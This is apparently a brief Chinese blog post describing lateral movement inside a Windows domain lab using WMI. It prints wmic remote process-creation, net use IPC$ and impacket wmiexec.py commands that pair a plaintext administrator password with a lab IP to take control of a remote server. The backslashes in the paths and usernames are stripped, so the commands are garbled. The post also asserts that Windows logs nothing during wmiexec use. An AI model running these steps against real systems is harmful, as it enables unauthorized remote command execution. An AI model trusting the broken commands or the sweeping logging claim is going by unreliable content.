自从PsExec被杀毒软件监控之后,黑客们又开始转移到WMI上,通过渗透测试发现,使用wmiexec进行横向移动时,windows操作系统竟然无动于衷,没有做任何日志记录。于是,越来越多的APT高级持续性威胁,开始了对WMI进行攻击研究~
1、使用WMI远程命令执行
- win7域用户--> windows server 2012域用户(成功)
wmic /node:192.168.160.143 /user:HACKBIJIAdministrator /password:W2ngluoanquan process call create "cmd.exe /c ipconfig >c:ip.txt"
- 去windows server 2012域用户的C盘下,可以发现生成的 ip.txt 文件
- 建立
IPC$(win7域用户--> windows server 2012域用户)
net use 192.168.160.143ipc$ "W2ngluoanquan" /user:HACKBIJIAdministrator
- 获取ip.txt文件信息 (windows server 2012域用户)
type 192.168.160.143c$ip.txt
2、impacket工具包中的wmiexec
- impacket的github官方地址
- kali --> windows server 2012 (成功)
- 获取远程windows系统的控制权
- 不需要输入域信息
- 进入impacket目录,先执行
pip install .安装依赖 - 然后就可以轻松拿到远程windows server 2012系统的控制权了
python wmiexec.py Administrator:W2ngluoanquan@192.168.160.143
本篇完~
1540

被折叠的 条评论
为什么被折叠?



